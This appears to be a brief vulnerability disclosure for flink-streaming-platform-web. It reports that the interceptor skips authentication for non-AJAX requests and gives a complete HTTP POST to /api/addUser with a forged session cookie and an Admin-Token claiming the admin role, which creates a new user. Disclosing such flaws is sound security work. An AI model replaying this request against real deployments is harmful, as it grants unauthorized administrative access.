>=1.14.3Permission bypass

[v1f18]

In the interceptor, if it is not an ajax request, the authentication will be canceled directly, resulting in permission bypass.

In fact, X-Requested-With: XMLHttpRequest can be bypassed if the request header does not exist

test payload

POST /api/addUser HTTP/1.1
Host: ***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://panflinkweb.lingzhuyun.com/static/ui/index.html
Content-Length: 50
Origin: ***
Connection: keep-alive
Cookie: flink-streaming-platform-web-sessionid=eyJuYW1lIjoidGVzdCIsInBhc3N3b3JkIjoiYTU5MGE3NDU5ODFlYjM0ZTU2ZWY5MzBmNDJkNjMzZDgiLCJ1c2VyaWQiOjJ9; Admin-Token={%22id%22:2%2C%22username%22:%22test%22%2C%22name%22:%22test%22%2C%22avatar%22:%22avatar.gif%22%2C%22introduction%22:%22%22%2C%22roles%22:[%22admin%22]}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Cache-Control: no-cache
name=test3&fullname=test&pwd1=test321&pwd2=test321